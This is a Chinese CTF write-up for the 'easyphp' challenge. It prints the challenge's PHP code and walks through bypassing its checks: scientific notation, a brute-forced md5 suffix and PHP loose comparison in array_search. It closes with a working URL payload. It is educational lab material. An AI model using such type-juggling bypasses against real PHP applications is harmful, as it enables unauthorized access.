江苏工匠杯 easyphp
江苏工匠杯 easyphp
Andromeda
发布于 2022-10-27 14:21:16
发布于 2022-10-27 14:21:16
题目来源:
题目概览
一进来引入眼帘的就是一段PHP。
image-20220926212016805
<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
$a = $_GET['a'];
$b = $_GET['b'];
if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
$key1 = 1;
}else{
die("Emmm...再想想");
}
}else{
die("Emmm...");
}
$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
$d = array_search("DGGJ", $c["n"]);
$d === false?die("no..."):NULL;
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}
$key2 = 1;
}else{
die("no hack");
}
}else{
die("no");
}
if($key1 && $key2){
include "Hgfks.php";
echo "You're right"."\n";
}
?>分析一下代码吧。GET传三个参数a、b、c,满足一系列条件让key1=1 &&
参数a
a只有这一小段戏码。intval(a)将a转化成整数然后要满足大于6000000同时长度小于等于3。怎么办?可以想到使用科学计数法。
所以a=6e7。
if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3)参数b
if(isset($b) && '8b184b' === substr(md5($b),-6,6))这段代码截取$b经过md5加密后的最后六位字符,需要满足=== '8b184b'。所以要找一个数字或字符串,经过md5加密后最后六位为8b184b。
跑个代码就得到了,得到结果为53724。
import hashlib
for i in range(0, 100000):
hl=hashlib.md5()
s = str(i)
hl.update(s.encode(encoding='utf8'))
md5=hl.hexdigest()
if str(md5)[-6:] == "8b184b":
print(s + ":" + str(md5))
break所以b=53724。
a和b解决之后就可以让$key1=1了。
参数c
这一个参数应该是最难的,反正我是搞了很久。
$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
$d = array_search("DGGJ", $c["n"]);
$d === false?die("no..."):NULL;
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}
$key2 = 1;
}else{
die("no hack");
}
}else{
die("no");
}第一行可知,传入的c应该是一个JSON格式的字符串,然后解析成数组。
首先判断@c["m"]是否为数字,如果是就寄了。还需要满足
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022)又是弱类型比较,第一部分这样就可以了。
{
"m":"2023a",
}@c["n"]为含两个元素的数组,且
if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0]))所以继续补充如下。
{
"m":"2023a",
"n": [
[1, 2, 3],
[4, 5, 6]
]
}最后一部分了。
$d = array_search("DGGJ", $c["n"]);
$d === false?die("no..."):NULL;
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}d = array_search("DGGJ", d = = = false?die("no..."):NULL;这两句,在数组
{
"m":"2023a",
"n": [
[1, 2, 3],
"DGGJ"
]
}这段代码遍历$c["n"]数组中的值,如果出现了DGGJ则退出进程。得想点办法绕过去。
foreach($c["n"] as $key=>$val){
$val==="DGGJ"?die("no......"):NULL;
}还是回到array_search()这个函数,把c中的DGGJ换成0即可。
这里的array_search()没有设置strict参数(如果该参数被设置为 TRUE,则函数在数组中搜索数据类型和值都一致的元素),我们就可以用0和DGGJ进行弱比较,0 == 'DGGJ'。
这样最后的c就整出来了。
{
"m":"2023a",
"n": [
[1, 2, 3],
0
]
}拿下flag
所以最后payload为:
?a=6e7&b=53724&c={"m":"2023a","n":[[1,2,3],0]}
#url编码
?a=6e7&b=53724&c=%7B%22m%22%3A%222023a%22%2C%22n%22%3A%5B%5B1%2C2%2C3%5D%2C0%5D%7D拿下flag
image-20220926220154599
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-09-26,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录